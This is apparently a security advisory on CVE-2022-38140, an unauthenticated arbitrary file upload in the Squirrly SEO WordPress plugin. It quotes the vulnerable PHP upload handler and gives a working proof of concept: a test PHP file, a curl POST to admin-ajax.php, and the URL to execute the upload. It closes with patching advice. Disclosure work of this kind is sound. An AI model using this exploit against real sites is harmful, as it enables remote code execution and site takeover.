CVE-2022-38140 - Squirrly SEO WordPress Plugin Authentication Bypass Leads to Arbitrary File Upload
Recently, CVE-2022-38140 was assigned to an arbitrary file upload vulnerability that has been discovered in the "SEO Plugin by Squirrly SEO" plugin for WordPress. This vulnerability impacts all versions of the plugin up to and including version 12.1.10 and could allow attackers to bypass authentication and upload malicious files onto websites running vulnerable instances of the plugin. If successfully exploited, this could result in full website compromise. Consequently, a timely disclosure of this vulnerability and its associated details is required in order to make web administrators aware, so they may take necessary action to secure their websites from possible exploits.
The SEO Plugin by Squirrly SEO is a popular WordPress plugin that aims to simplify the process of achieving and maintaining search engine optimization (SEO) for websites built on WordPress. With its robust features and user-friendly interface, it has quickly gained popularity among WordPress administrators, making it a popular target for attackers.
Exploit Details
The vulnerability stems from an authentication bypass vulnerability in the plugin. To better understand the vulnerability, let's first look at the code that handles file uploads in the plugin:
/**
* AJAX Upload file
*/
public function sq_ajax_seosettings_attachment_upload () {
$targetDir = dirname(dirname (__FILE__)) . '/tmp';
if (!file_exists ($targetDir) && !@mkdir ($targetDir, 0775, true)) {
echo json_encode (array('error' => __('Failed to create folders.', _SQ_PLUGIN_NAME_)));
exit();
}
if (!empty($_FILES)) {
$tempFile = $_FILES['file']['tmp_name'];
$targetFile = $targetDir . '/' . $_FILES['file']['name'];
move_uploaded_file($tempFile, $targetFile);
echo json_encode (array('success' => __('Upload Complete.', _SQ_PLUGIN_NAME_)));
} else {
echo json_encode (array('error' => __('No files to upload or wrong server configuration.', _SQ_PLUGIN_NAME_)));
}
exit();
}
The problematic code is present within the sq_ajax_seosettings_attachment_upload() function. In this function, files are uploaded to the tmp folder within the plugin's directory. However, there is no validation or authentication check before the file is uploaded, allowing unauthenticated users to upload files onto the server. This allows an attacker to upload arbitrary files, which can include malicious PHP scripts or other executable files, to the server.
Moreover, the specific nature of this vulnerability requires no interaction with any other WordPress components and can be exploited by simply sending a specially crafted POST request to the vulnerable site.
Links to Original References
- CVE: https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38140
- Squirrly SEO Plugin: https://wordpress.org/plugins/squirrly-seo/
Create a PHP file with the following content
<?php
echo 'Arbitrary code execution test: ' . php_uname();
?>
Send a POST request to the vulnerable site using curl or an equivalent tool
curl -X POST -F "file=@/path/to/test.php" "http://vulnerable-website.com/wp-admin/admin-ajax.php?action=sq_seosettings_attachment_upload";
Access the uploaded file via the following URL
http://vulnerable-website.com/wp-content/plugins/squirrly-seo/tmp/test.php
If executed successfully, this should output a string displaying information about the underlying server.
Recommended Solutions
To protect your website from this vulnerability, it is crucial to update the "SEO Plugin by Squirrly SEO" plugin to version 12.1.11 or later immediately. Additionally, make sure to follow best practices in maintaining and securing your WordPress installation, and regularly update all plugins and themes to their latest versions.
For more information on WordPress security, please visit https://codex.wordpress.org/Hardening_WordPress.
Timeline
Published on: 11/28/2022 20:15:00 UTC
Last modified on: 12/01/2022 22:56:00 UTC